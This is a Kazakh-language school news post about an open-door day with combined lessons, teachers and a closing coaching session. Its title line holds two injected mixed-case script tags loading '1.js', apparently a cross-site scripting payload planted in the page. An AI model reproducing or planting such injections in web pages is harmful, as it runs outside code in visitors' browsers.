Бүгін біздің мектепте ашық есік күні өтті<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

17.10.2024

Бүгін, 2024 жылғы 17 қазанда, біздің мектепте Ашық есік күні өтті. Іс-шараны аудандық білім бөлімінің әдістемелік бөлімі ұйымдастырды. Іс-шараға ауданымыздың мұғалімдері және аудандық білім бөлімінің меңгерушісі Нұрпейісова Г. Х. қатысты. Ашық есік күнінің басты мақсаты — біздің мектептегі біріккен сабақтардың қалай өтетінін бақылау болды.

 

Мұғалімдер мен қонақтар әртүрлі сыныптардағы біріккен сабақтарға қатысу мүмкіндігіне ие болды. Сабақтар мазмұнды және қызықты өтті:

 

 • Математика: 5 «А» және 7 «А» сыныптарына біріктірілген сабақты математика пәнінің мұғалімі, педагог-модератор Ернар Сәрсенбі өткізді.

 • Әдебиет: 6 «А» және 8 «А» сыныптарына сабақты педагог-модератор, әдебиет пәнінің мұғалімі Нұрмағамбетова Ақбаян Мейрамханқызы өткізді.

 • Биология: 6 және 8 сыныптарында біріктірілген сабақты педагог-сарапшы Халибек Амандық өткізді.

 

Ашық есік күні ұстаздар үшін коучингпен аяқталды, оны Далабай ауылындағы негізгі орта мектептің оқу-тәрбие ісі жөніндегі орынбасары Мықтыбекова З.К. жүргізді.

 

Бұл іс-шара қатысушыларға әдістемелік жаңалықтарды көріп қана қоймай, тәжірибе алмасуға және аудан мұғалімдері арасында кәсіби байланысты нығайтуға мүмкіндік берді.

Просмотров: 269


Пікір қосу



Деректерді қолтаңбаға қосу